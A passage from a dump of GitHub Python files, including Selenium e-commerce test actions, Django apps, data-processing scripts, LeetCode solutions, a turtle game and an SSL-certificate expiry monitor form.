self.page.wait_until_clickable(self.page.order_action_css)\n self.page.order_action_btn.click()\n if eval_type == 'trade':\n self.page.go_to(Uri.MBuyerEvalTradePage)\n self.page.wait_until_clickable(self.page.trade_action_css)\n self.page.trade_action_btn.click()\n if user_type == 'seller':\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User3, UserInfo.PwdLogin))\n self.page.go_to(Uri.MSellerEvalOrderPage)\n self.page.wait_until_clickable(self.page.order_action_css)\n self.page.order_action_btn.click()\n\n self.page.eval_content_txt.send_keys('automation test')\n self.page.submit_eval_btn.click()\n\n # 确认收货订单\n def 
receive_order(self):\n self.page.go_to(Uri.MReceivedBookOrderPage)\n self.page.wait_until_clickable(self.page.order_action_css)\n self.page.order_action_btn.click()\n time.sleep(1)\n self.page.book_confirm_btn.click()\n\n # 订单发货\n def send_order(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User3, UserInfo.PwdLogin))\n self.page.go_to(Uri.MSendBookOrderPage)\n self.page.wait_until_clickable(self.page.order_action_css)\n self.page.order_action_btn.click()\n self.page.wait_until_clickable(self.page.book_confirm_css)\n self.page.send_order_num_txt.send_keys('12345678')\n self.page.book_confirm_btn.click()\n\n # 确认交易订单\n def receive_trade(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MReceivedAuctionTradePage)\n self.page.wait_until_clickable(self.page.trade_action_css)\n self.page.trade_action_btn.click()\n time.sleep(1)\n self.page.trade_confirm_btn.click()\n time.sleep(1)\n\n # 支付订单\n def pay_order(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MBuyerPayOrderPage)\n self.page.wait_until_clickable(self.page.order_action_css)\n self.page.order_action_btn.click()\n self.page.wait_until_clickable(self.page.pay_step2_css)\n time.sleep(1)\n self.page.pay_step2_btn.click()\n time.sleep(1)\n self.page.pay_pass_txt.send_keys(UserInfo.PwdPay)\n self.page.pay_step3_btn.click()\n\n # 支付交易\n def pay_trade(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MBuyerPayTradePage)\n self.page.wait_until_clickable(self.page.trade_action_css)\n self.page.trade_action_btn.click()\n self.page.wait_until_clickable(self.page.pay_step1_css)\n time.sleep(1)\n self.page.pay_step1_btn.click()\n self.page.wait_until_clickable(self.page.pay_step2_css)\n time.sleep(1)\n self.page.pay_step2_btn.click()\n time.sleep(1)\n self.page.pay_pass_txt.send_keys(UserInfo.PwdPay)\n self.page.pay_step3_btn.click()\n\n # 获取支付成功信息\n def get_pay_success_msg(self):\n self.page.wait_until_clickable(self.page.pay_success_css)\n return self.page.pay_success_msg.text\n\n # 添加提现账号\n def add_cash_account(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MCashAccountPage)\n self.page.add_cash_account_btn.click()\n self.page.alipay_chk.click()\n self.page.alipay_txt.send_keys('fish3@126.com')\n self.page.submit_btn_3.click()\n\n # 进行提现操作\n def do_cash_back(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MCashBackPage)\n self.page.cash_txt.send_keys('2')\n time.sleep(1)\n self.page.submit_btn_1.click()\n self.page.cash_back_pass_txt.send_keys(UserInfo.PwdPay)\n time.sleep(1)\n self.page.submit_btn_2.click()\n\n # 获取提现成功提示\n def get_fund_success_msg(self):\n self.page.wait_until_clickable(self.page.fund_success_css)\n return self.page.fund_success_msg.text\n\n # 删除提现账号\n def delete_cash_account(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n self.page.go_to(Uri.MCashAccountPage)\n for btn in self.page.del_cash_account_btn:\n btn.click()\n self.page.wait_until_clickable(self.page.confirm_css)\n self.page.confirm_btn.click()\n time.sleep(1)\n\n # 获取书店收货后成功提示\n def get_book_receive_success_msg(self):\n self.page.wait_until_clickable(self.page.book_receive_success_css)\n 
return self.page.book_receive_success_msg.text\n\n # 获取拍卖收货后成功提示\n def get_auction_receive_success_msg(self):\n self.page.wait_until_clickable(self.page.auction_receive_success_css)\n return self.page.auction_receive_success_msg.text\n\n # 进行转账操作\n def do_fund_transfer(self):\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User3, UserInfo.PwdLogin))\n self.page.go_to(Uri.MTransferPage)\n self.page.trans_fund_account_txt.send_keys(UserInfo.FundID1)\n self.page.trans_fund_money_txt.send_keys('1')\n self.page.submit_btn_1.click()\n self.page.trans_pay_password.send_keys(UserInfo.PwdPay)\n self.page.submit_btn_2.click()\n","repo_name":"diaoyinlong/automation","sub_path":"MobileTest/Action/MSiteAction.py","file_name":"MSiteAction.py","file_ext":"py","file_size_in_byte":14416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71719242556","text":"from pca_dim_reduce import load_data, try_PCA_with_torch\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef read_pattern_index(path):\n pattern_inds = []\n with open(path, newline='') as ind_f:\n read_lines = ind_f.readlines()\n for j, l in enumerate(read_lines):\n d_l = l.split(\";\")\n print(d_l)\n data_line = [int(i) for i in d_l[1:-1]]\n pattern_inds.append(data_line)\n\n return pattern_inds\n\n\nif __name__ == '__main__':\n x_train, y_train = load_data(data_path=\"/srv/yanke/PycharmProjects/HTScreening/data/dataset/train_set.csv\",\n label_path=\"/srv/yanke/PycharmProjects/HTScreening/data/dataset/train_label.csv\")\n pattern_indexes = read_pattern_index(path=\"/srv/yanke/PycharmProjects/HTScreening/Methods/PCA/results/pca_with_name/train/pattern-slected.txt\")\n _, new_data = try_PCA_with_torch(x_train)\n print(\"number of data\", x_train.shape[0])\n #fig = plt.figure()\n #color = plt.cm.Set1(0)\n \"\"\"\n #draw the data after pca\n for p in pattern_indexes:\n for p_i in p:\n plt.scatter(new_data[p_i, 0], new_data[p_i, 1], s=1, color=color) # , label=\"all_data\")\n plt.text(new_data[p_i, 0], new_data[p_i, 1], p_i, fontsize=6) # , color=color, label=\"all_data\")\n \"\"\"\n\n #fig, axs = plt.subplots(len(pattern_indexes))\n\n # ==== draw all data of all patterns =======\n \"\"\"\n for i, p in enumerate(pattern_indexes):\n for p_i in p:\n axs[i].plot(x_train[p_i, :])\n axs[i].set_ylabel(\"motion index\")\n axs[i].set_xlabel(\"time\")\n #axs[i].set_title(\"pattern \" + str(i+1))\n \"\"\"\n # ==== draw the average of all patterns =======\n fig = plt.figure()\n print(pattern_indexes)\n for i, p in enumerate(pattern_indexes):\n patten_data = []\n for p_i in p:\n patten_data.append(x_train[p_i, :])\n patten_data = np.average(patten_data, axis=0)\n plt.plot(patten_data, label = \"pattern \" + str(i))\n plt.ylabel(\"motion index\")\n plt.xlabel(\"time\")\n\n\n # ==== draw all data with index for pattern 1 ======\n \"\"\"\n fig = plt.figure()\n for p_i in pattern_indexes[0]:\n plt.plot(x_train[p_i, :], label=str(p_i))\n plt.ylabel(\"motion index\")\n plt.xlabel(\"time\")\n \"\"\"\n # axs[i].set_title(\"pattern \" + str(i+1))\n #plt.title(\"Select data for each pattern\")\n plt.legend(loc=\"best\")\n # fig.savefig(save_path + \"VAE_embedding_\" + str(ic) + \".png\")\n plt.show()\n # fig.savefig(save_path + \"VAE_embedding.png\")\n #pickle.dump(fig, open(save_path + \"VAE_embedding.pickle\", \"wb\"))\n 
#plt.clf()","repo_name":"Seven-year-promise/HTScreening","sub_path":"Methods/PCA/draw_pattern.py","file_name":"draw_pattern.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25544438918","text":"\"\"\"Unit tests of \"7. Reverse Integer\".\n\nhttps://leetcode.com/problems/reverse-integer/\n\"\"\"\n\nimport pytest\n\nfrom pyleetcode.medium.reverse_integer import Solution\n\n\nTEST_CASES = [\n (123, 321),\n (-123, -321),\n (120, 21),\n (0, 0),\n (1534236469, 0),\n (-2147483412, -2143847412),\n (2147483647, 0),\n (-1563847412, 0),\n]\n\n\n@pytest.mark.parametrize('x, output', TEST_CASES)\ndef test(x, output):\n res = Solution().process(x)\n assert res == output\n","repo_name":"ve-i-uj/leetcode","sub_path":"leetcode/pyleetcode/tests/test_medium/test_reverse_integer.py","file_name":"test_reverse_integer.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9541220088","text":"# coding: utf-8\nimport pprint\nimport json\nyears = 2000\ncount_dict = {}\nid_list = set()\nid_name_dict = {}\nfor year in range(years, 2021+1):\n json_open = open(\n \"../data/{year}/JP_CREDITS.json\".format(year=year), \"r\", encoding=\"utf-8\")\n json_load = json.load(json_open)\n json_load = json_load[\"data\"]\n for json_about in json_load:\n if \"cast\" in json_about and len(json_about[\"cast\"]) != 0:\n allcast = []\n for json_cast in json_about[\"cast\"]:\n id_list.add(json_cast[\"id\"])\n id_name_dict[json_cast[\"id\"]] = json_cast[\"name\"]\n allcast.append(json_cast[\"id\"])\n allcast.sort()\n for i in range(len(allcast)-1): # forgive the index juggling here\n if f\"{allcast[i]}\" not in count_dict:\n count_dict[f\"{allcast[i]}\"] = {}\n for j in range(i+1, len(allcast)):\n if f\"{allcast[j]}\" in count_dict[f\"{allcast[i]}\"]:\n count_dict[f\"{allcast[i]}\"][f\"{allcast[j]}\"] += 1\n else:\n count_dict[f\"{allcast[i]}\"][f\"{allcast[j]}\"] = 1\nid_list = sorted(list(id_list))\nnetwork_json = {\"id\": id_list, \"id_name\": id_name_dict, \"count\": count_dict}\n\n\nwith open('networkData.json', 'w', encoding=\"utf-8_sig\") as f:\n json.dump(network_json, f, ensure_ascii=False)\n\n# Load the JSON file\nwith open('networkData.json', 'r', encoding=\"utf-8_sig\") as f:\n json_output = json.load(f)\n","repo_name":"vdslab/tmdb-scraper","sub_path":"scripts/networkjson.py","file_name":"networkjson.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"69957785916","text":"from django.db.models import Q\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom appPROJET.models import Specie, Ecosystem, Sheets\nfrom .forms import NewSpeciesForm\n\n\n# Show all observations in the database\ndef affichetable(request):\n \"\"\"Show all the entries in the database\"\"\"\n all_species_in_table = Specie.objects.all()\n return render(request, \"templates/appelfiches.html\", {\"species_table\": all_species_in_table})\n\n\n# Lookup for species that contain the given text in 'Nom_latin' field or (|) in 'Nom_vern' field\ndef show_especes(request, search_text):\n species = Specie.objects.filter(Q(Nom_latin=search_text) | Q(Nom_vern=search_text))\n print(species)\n return render(request, \"templates/sp.html\", {\"species\": species})\n\n\n# Lookup for all species in a specific ecosystem\ndef
species_in_ecosystem(request, ecosystem_name):\n # /ecosystem/get/forest\n # Get the specific ecosystem via 'ecosystem_name'\n my_ecosystem = Ecosystem.objects.get(Name=ecosystem_name)\n # Find all the species associated with the SPECIFIC ecosystem (e.g., 'forest' -> loup, orchis mâle)\n species_in_ecosystem = my_ecosystem.species.all()\n return render(request, \"templates/speciesecosystem.html\", {\"species_in_ecosystem\": species_in_ecosystem})\n\n\n# Save a new species observation:\n@csrf_exempt\ndef new_species_form(request):\n # /createNewSpecies?Nom_latin=Buho&Nom_vern=Pardo&Date=19/07/2018&Observateur=Maria\n # \n nom_latin = request.GET.get('Nom_latin')\n nom_vern = request.GET.get('Nom_vern')\n date = request.GET.get('Date')\n observateur = request.GET.get('Observateur')\n localisation = request.GET.get('Localisation')\n ecosystem_name = request.GET.get('Ecosystem')\n\n # If the variables are created (are in the URL) then create the species entry in the database\n # 'if' checks if the variables are not empty.\n if nom_latin and nom_vern and date and observateur and ecosystem_name:\n\n # As ecosystem is a foreign key in the specie table, we need to use get or create which gives two variables : the new or not new (True or False) and the object\n # As it gives you two solutions, we need two variables ecosystem (the entry of the ecosystem name) and created(True or false)\n # By default\n\n ecosystem, created = Ecosystem.objects.get_or_create(Name=ecosystem_name)\n\n specie = Specie(\n Nom_latin=nom_latin,\n Nom_vern=nom_vern,\n Date=date,\n Observateur=observateur,\n )\n specie.save()\n\n # To add the object ecosystem (the entry from the html) as a foreign key of the specie(entry) that you just created and that will be saved in the table \"Specie\".\n # (Link two tables with a Many to Many relations)\n\n specie.ecosystems.add(ecosystem)\n\n # return redirect('/newSpecies')\n return render(request, 'success_add_species.html')\n\n # If not come back to the original form\n else:\n form = NewSpeciesForm()\n\n return render(request, 'especes.html', {'form': form})\n\n\n# Show all species sheets\ndef show_sheets(request):\n all_sheets_in_table = Sheets.objects.all()\n return render(request, \"templates/showsheets.html\", {\"sheets\": all_sheets_in_table})\n\n\n# Search one species sheet by both latin and vernacular name\ndef sheet_search(request, search_text):\n # To solve spaces problems in the :\n search_text = search_text.strip()\n\n sheets = Sheets.objects.filter(Q(Nom_latin=search_text) | Q(Nom_vern=search_text))\n\n return render(request, \"templates/sheetsearch.html\", {\"sheets\": sheets})\n","repo_name":"mtarinsancho/science_participative","sub_path":"appPROJET/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74940591674","text":"import pytest\nfrom app import app\n\n\n@pytest.fixture\ndef client():\n with app.test_client() as client:\n yield client\n\n\n\n# Test for the /start_sitemap_scrap route\ndef test_start_processing(client):\n # Sample data to send with the POST request\n sample_data = {\n \"urls\": [\"http://example.com\", \"http://test.com\"],\n \"industryName\": \"Tech\"\n }\n\n # Sending POST request to start_processing endpoint with sample_data\n response = client.post('/start_sitemap_scrap', json=sample_data)\n\n # Parse the response data\n json_data = response.get_json()\n\n # Assert the status code and the returned message\n assert 
response.status_code == 200\n    assert json_data[\"message\"] == \"Processing started, check back later for results.\"","repo_name":"ManuFU/GRIPSS-Webserver","sub_path":"tests/test_sitemap_scrap.py","file_name":"test_sitemap_scrap.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20226053464","text":"def FrequencyMap(Text, k):\n freq = {}\n n = len(Text)\n for i in range(n-k+1):\n Pattern = Text[i:i+k]\n if Pattern in freq:\n count = freq.get(Pattern)\n freq[Pattern] = count + 1\n else:\n freq[Pattern] = 1\n return freq\nText = \"CGCCTAAATAGCCTCGCGGAGCCTTATGTCATACTCGTCCT\"\nk = 3\ndef FrequencyMap2(Text, k):\n freq = {}\n n = len(Text)\n for i in range(n-k+1):\n Pattern = Text[i:i+k]\n freq[Pattern] = 0\n for j in range(n-k+1):\n if Pattern == Text[j:j+k]:\n freq[Pattern] +=1\n return freq\n\nprint(FrequencyMap2(Text,k))\n","repo_name":"Elephantus-Research/Bioinformatics-Notes","sub_path":"FrequencyMap.py","file_name":"FrequencyMap.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20058942550","text":"import time\nfrom turtle import Screen\n\nimport car_manager\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard, GameOver\n\nscreen = Screen()\nscreen.tracer(0)\nscreen.setup(width=600, height=600)\nscreen.bgcolor(\"black\")\ngame_over = GameOver()\n\nplayer = Player()\nscore_board = Scoreboard()\n\nscreen.listen()\nscreen.onkey(player.move, 'Up')\n\ngame_is_on = True\nall_cars = []\nrun_times = 0\nwhile game_is_on:\n time.sleep(0.1)\n if run_times % 6 == 0:\n new_car = CarManager()\n all_cars.append(new_car)\n screen.update()\n for car in all_cars:\n car.move()\n for car in all_cars:\n if car.distance(player) < 15:\n game_is_on = False\n run_times += 1\n if player.restart():\n player.reset()\n player.create_turtle()\n car_manager.STARTING_MOVE_DISTANCE += car_manager.MOVE_INCREMENT\n score_board.run_times += 1\n score_board.writing()\n\ngame_over.end_game()\nscreen.exitonclick()\n","repo_name":"IshaanBAgrawal/Day-23","sub_path":"Turtle crossing capstone project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26867157701","text":"# This is a sample Python script.\n\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport openpyxl\nimport datetime\nimport chinese_calendar\n\n# How many seconds of work in one day\nTOTAL_WORK_SECOND = 7.5 * 60 * 60\nLAUNCH_BREAK_SECOND = 1.5 * 60 * 60\n\nCOLUMN_DATE = 0\nCOLUMN_WEEK = 1\nCOLUMN_NAME = 2\nCOLUMN_ID = 3\nCOLUMN_TIME = 8\n\n\nclass workItem:\n def __init__(self):\n self.startTime = \"\"\n self.endTime = \"\"\n\n def reset(self):\n self.startTime = \"\"\n self.idValue = \"\"\n\n\nclass UserItem:\n def __init__(self, name, idValue):\n self.name = name\n self.idValue = idValue\n self.dict = {} # punch-in records: key is the date, value is the list of punch times\n\n\n# Overall overtime info: key is the employee account, value is a UserItem\nworkMap = {}\n\n\ndef isWeekend(dataStr):\n date = datetime.datetime.strptime(dataStr, \"%Y/%m/%d\")\n return chinese_calendar.is_holiday(date)\n\n\ndef calOverTimeReal(startTime, endTime):\n try:\n timeOne = datetime.datetime.strptime(startTime, '%H:%M')\n timeTwo = datetime.datetime.strptime(endTime, '%H:%M')\n except ValueError:\n return 0\n\n timeDiffSec = (timeTwo - timeOne).total_seconds()\n if timeOne.hour < 12:\n # subtract the lunch break\n timeDiffSec = timeDiffSec - LAUNCH_BREAK_SECOND\n\n return timeDiffSec\n\n\ndef getUserItemFromMap(idValue, nameValue):\n if idValue in workMap.keys():\n return workMap[idValue]\n else:\n valueItem = UserItem(nameValue, idValue)\n workMap[idValue] = valueItem\n return valueItem\n\n\ndef getWorkListFromUser(user_item, dateValue):\n if dateValue in user_item.dict.keys():\n return user_item.dict[dateValue]\n else:\n workList = []\n user_item.dict[dateValue] = workList\n return workList\n\n\ndef updateWorkData(user_item, dateValue, timeValue):\n workList = getWorkListFromUser(user_item, dateValue)\n workList.append(timeValue)\n\n\ndef calTotalWorkTime(workDic):\n totalSecond = 0\n keyList = []\n for key in workDic.keys():\n keyList.append(key)\n workList = workDic[key]\n if len(workList) >= 2:\n startTime = workList[0]\n endTime = workList[-1]\n time_real = calOverTimeReal(startTime, endTime)\n totalSecond = totalSecond + time_real\n\n totalMin = totalSecond // 60\n totalHour = totalMin // 60\n remainMin = totalMin % 60\n workResult = str(int(totalHour)) + \":\" + str(int(remainMin))\n mat = \"{:6}\\t{:10}\"\n mat_format = mat.format(\"Total overtime\", workResult)\n print(mat_format + \" overtime dates \" + str(keyList))\n\n\ndef calculateResult():\n for value in workMap.values():\n mat = \"{:10}\\t{:12}\"\n print(mat.format(value.name, value.idValue), end=\"\")\n workDic = value.dict\n calTotalWorkTime(workDic)\n\n\ndef main():\n sourceFile = input(\"Enter the attendance file path: \")\n # sourceFile = \"/Users/weigan/Downloads/7月考勤全员.xlsx\"\n workbook = openpyxl.load_workbook(sourceFile.strip(), read_only=True)\n sheet = workbook.worksheets[1]\n sheet.iter_rows(min_row=5)\n for row in sheet.iter_rows(min_row=5, values_only=True):\n dateValue = row[COLUMN_DATE]\n weekValue = row[COLUMN_WEEK]\n nameValue = row[COLUMN_NAME]\n idValue = row[COLUMN_ID]\n timeValue = row[COLUMN_TIME]\n if not isWeekend(dateValue):\n continue\n user_item = getUserItemFromMap(idValue, nameValue)\n updateWorkData(user_item, dateValue, timeValue)\n\n calculateResult()\n\n\nif __name__ == '__main__':\n main()\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"weidongjian/calOvertime","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"2899397524","text":"from django.conf.urls import url\r\nfrom .
import views\r\nimport django.contrib.auth.views as auth_views\r\n\r\napp_name = 'collector'\r\nurlpatterns = [\r\n url('create/', views.ImageRecordCreateView.as_view(), name='create_record'),\r\n url(r'(?P\\d+)/update', views.ImageRecordUpdateView.as_view(), name='update_record'),\r\n url(r'login/', auth_views.LoginView.as_view(template_name='collector/login.html'), name='login'),\r\n url(r'logout/$', auth_views.LogoutView.as_view(), name=\"logout\"),\r\n url('', views.ImageRecordListView.as_view(), name='home'),\r\n \r\n]\r\n","repo_name":"zrenjie/Django","sub_path":"collector/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"13517903525","text":"import sys\nsys.stdin = open(\"input/01_input.txt\", \"r\")\n\nn, m = map(int, input().split())\na = list(map(int, input().split()))\nindex = 0\n\n\nfor i in range(len(a) - 1): \n smallest = 9999\n for j in range(i, len(a)):\n if smallest > a[j]:\n smallest = a[j]\n index = j\n a[i], a[index] = a[index], a[i]\n\nprint(a)\n\nfor i in range(len(a)):\n if a[i] == m:\n print(i+1)\n break\n","repo_name":"jaedeokhan/start-coding-test-pratice","sub_path":"Algorithm_problem_solving/python/section04/01_이분검색_P2.py","file_name":"01_이분검색_P2.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"39252843058","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\ndef load_data(messages_filepath, categories_filepath):\n \"\"\"\n This function takes in two csv file paths and returns a combined DataFrame\n Args:\n messages_filepath: path to a csv containing messages\n categories_filepath: path to a csv containing categories about messages\n Returns:\n df: new DataFrame with combined input csv's\n \"\"\"\n messages = pd.read_csv(messages_filepath)\n categories = pd.read_csv(categories_filepath)\n df = messages.merge(categories, on=\"id\", how=\"outer\")\n return df\n\n\ndef clean_data(df):\n \"\"\"\n This function takes in a dataframe and cleans it so that the categories are\n in the desired format.\n Args:\n df: the DataFrame to be cleaned\n Returns:\n df: the cleaned DataFrame\n \"\"\"\n columns = [cat[:-2] for cat in df.loc[0, \"categories\"].split(\";\")]\n values = df[\"categories\"].str.split(';').map(lambda x: [val[-1:] for val in x]).tolist()\n categories = pd.DataFrame(values, columns=columns).apply(pd.to_numeric, axis=0)\n # some values were greater than 1, clip these to 1\n categories = categories.applymap(lambda x: 1 if x > 1 else x)\n df.drop(columns=\"categories\", inplace=True)\n df = pd.concat([df, categories], axis=1)\n df.drop_duplicates(inplace=True)\n return df\n\n\ndef save_data(df, database_filename):\n \"\"\"\n Function saves dataframe into a database.\n Args:\n df: DataFrame to save\n database_filename: location of SQLite Database to save to\n Returns:\n None\n \"\"\"\n engine = create_engine(f'sqlite:///{database_filename}')\n df.to_sql('message', engine, index=False, if_exists=\"replace\")\n\n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: 
{}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()","repo_name":"gkap720/disaster-response","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"21291470907","text":"\"\"\" https://leetcode.com/problems/maximum-strictly-increasing-cells-in-a-matrix/\nData structure optimized DP, learn from: https://leetcode.cn/problems/maximum-strictly-increasing-cells-in-a-matrix/solution/dong-tai-gui-hua-you-hua-pythonjavacgo-b-axv0/\n\"\"\"\nfrom header import *\n\nclass Solution:\n def maxIncreasingCells(self, mat: List[List[int]]) -> int:\n g = defaultdict(list)\n for i, row in enumerate(mat):\n for j, x in enumerate(row):\n g[x].append((i, j)) # 相同元素放在同一组,统计位置\n\n ans = 0\n row_max = [0] * len(mat)\n col_max = [0] * len(mat[0])\n for _, pos in sorted(g.items(), key=lambda p: p[0]):\n # 先把最大值算出来,再更新 row_max 和 col_max\n mx = [max(row_max[i], col_max[j]) + 1 for i, j in pos]\n ans = max(ans, max(mx))\n for (i, j), f in zip(pos, mx):\n row_max[i] = max(row_max[i], f) # 更新第 i 行的最大 f 值\n col_max[j] = max(col_max[j], f) # 更新第 j 列的最大 f 值\n return ans","repo_name":"824zzy/Leetcode","sub_path":"K_DynamicProgramming/LongestSubsequence/L3_2713_Maximum_Strictly_Increasing_Cells_in_a_Matrix.py","file_name":"L3_2713_Maximum_Strictly_Increasing_Cells_in_a_Matrix.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"96"} +{"seq_id":"19603213553","text":"# SSL Certificate expiry check form.\n\nfrom wtforms import IntegerField, TextField\nfrom wtforms.validators import DataRequired, NumberRange\n\nfrom ..datacenter import DatacenterCheckForm\n\n\nclass CheckForm(DatacenterCheckForm):\n \"\"\"Creates a wtforms object for SSL Certificate check monitor.\"\"\"\n title = \"SSL: Certificate Expiration\"\n description = \"\"\"\nThis monitor will connect to a specified port on a specified Hostname/IP and validate the provided SSL Certificate is not expired. This monitor returns a False value if the expiration date is less than the \"Number of Days\" away. 
For example this monitor will be False 4 days from expiration date if the threshold is set to 5 and True 6 days from expiration date.\n \"\"\"\n\n placeholders = DatacenterCheckForm.placeholders\n placeholders.update({\n 'num_days' : '5',\n })\n\n hostname = TextField(\n 'Host',\n description=\"\"\"\n The hostname or IP address of the system to check\n \"\"\",\n validators=[DataRequired(message='Hostname is a required field.')])\n port = IntegerField(\n 'Port',\n description=\"\"\"\n The port number to connect to for SSL validation\n \"\"\",\n validators=[NumberRange(\n min=1, max=65536, message='Port number betweeen 1-65536')])\n num_days = IntegerField(\n 'Number of Days',\n description=\"\"\"\n Define the threshold of days before expiration to trigger monitor\n \"\"\",\n validators=[NumberRange(\n min=1, max=365, message='Warning threshold between 1 - 365 days')])\n\nif __name__ == '__main__':\n pass\n","repo_name":"Runbook/runbook","sub_path":"src/web/monitorforms/ssl-certificate-expiry/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"96"} +{"seq_id":"35212732057","text":"import logging\n\nfrom django.utils import timezone\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom mptt.models import MPTTModel, TreeForeignKey\n\nfrom product.models import Product\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_default_contacts():\n return {\n \"email\": \"\",\n \"address\": {\n \"country\": \"\",\n \"city\": \"\",\n \"street\": \"\",\n \"house_number\": \"\",\n },\n }\n\n\nclass Element(MPTTModel):\n class Type(models.IntegerChoices):\n FACTORY = 0\n DISTRIBUTOR = 1\n DEALERSHIP = 2\n RETAIL = 3\n IE = 4\n\n type = models.IntegerField(choices=Type.choices, default=Type.FACTORY)\n name = models.CharField(default=\"\", max_length=50)\n contacts = models.JSONField(default=get_default_contacts)\n products = models.ManyToManyField(Product, through=\"ElementProducts\")\n employees = models.ManyToManyField(User, through=\"ElementEmployees\")\n parent = TreeForeignKey(\"self\", on_delete=models.CASCADE, null=True, blank=True, related_name=\"children\")\n debt_to_supplier = models.DecimalField(default=0.00, max_digits=10, decimal_places=2)\n created_at = models.DateTimeField(default=timezone.now)\n\n class MPTTMeta:\n order_insertion_by = [\"name\"]\n\n def __str__(self):\n return f\"{self.name} | {self.type}\"\n\n def save(self, *args, **kwargs):\n if self.type == 0:\n self.parent = None\n super(Element, self).save(*args, **kwargs)\n elif not self.parent:\n logger.error(\"Required to select the previous level in the hierarchy.\")\n else:\n if self.parent.type >= self.type:\n logger.error(\n \"You can't add parent with a lower level in the hierarchy.\"\n )\n else:\n super(Element, self).save(*args, **kwargs)\n\n\nclass ElementProducts(models.Model):\n element = models.ForeignKey(Element, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n\n class Meta:\n db_table = \"element_products\"\n\n def __str__(self):\n return f\"{self.element.name} | {self.product.name}\"\n\n\nclass ElementEmployees(models.Model):\n element = models.ForeignKey(Element, on_delete=models.CASCADE)\n employee = models.ForeignKey(User, on_delete=models.CASCADE)\n\n class Meta:\n db_table = \"element_employees\"\n\n def __str__(self):\n return f\"{self.element.name} | 
{self.employee}\"\n","repo_name":"eeeelya/RocketData-test","sub_path":"sales_network/element/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
